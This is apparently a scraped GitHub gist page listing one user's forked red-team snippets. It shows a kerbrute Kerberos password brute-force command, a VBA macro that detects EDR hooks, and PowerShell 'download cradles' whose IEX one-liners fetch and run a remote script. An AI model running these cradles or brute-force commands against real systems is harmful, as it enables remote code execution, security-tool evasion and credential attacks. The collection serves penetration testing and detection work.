With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
tomwisniewskiprv
tomwisniewskiprv
/ hookdetector.vba
Created
December 13, 2020 09:00
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
tomwisniewskiprv
/ kerberos_attacks_cheatsheet.md
Created
July 6, 2020 16:08
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
tomwisniewskiprv
/ gist:5c7906965f69ebb6a35173fbe5e87a10
Created
March 23, 2020 10:57
testing powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "Hi $env:username from powershell" |
tomwisniewskiprv
/ DownloadCradles.ps1
Created
January 7, 2020 09:56
— forked from Heirhabarov/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################## System.Net. cradles ################################################## | |
| # System.Net.Webclient DownloadString | |
| IEX (New-Object Net.Webclient).DownloadString('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1') | |
| # System.Net.Webclient DownloadData | |
| IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'))) | |
| $test = (New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st | |
| # System.Net.Webclient DownloadFile (touches disk) |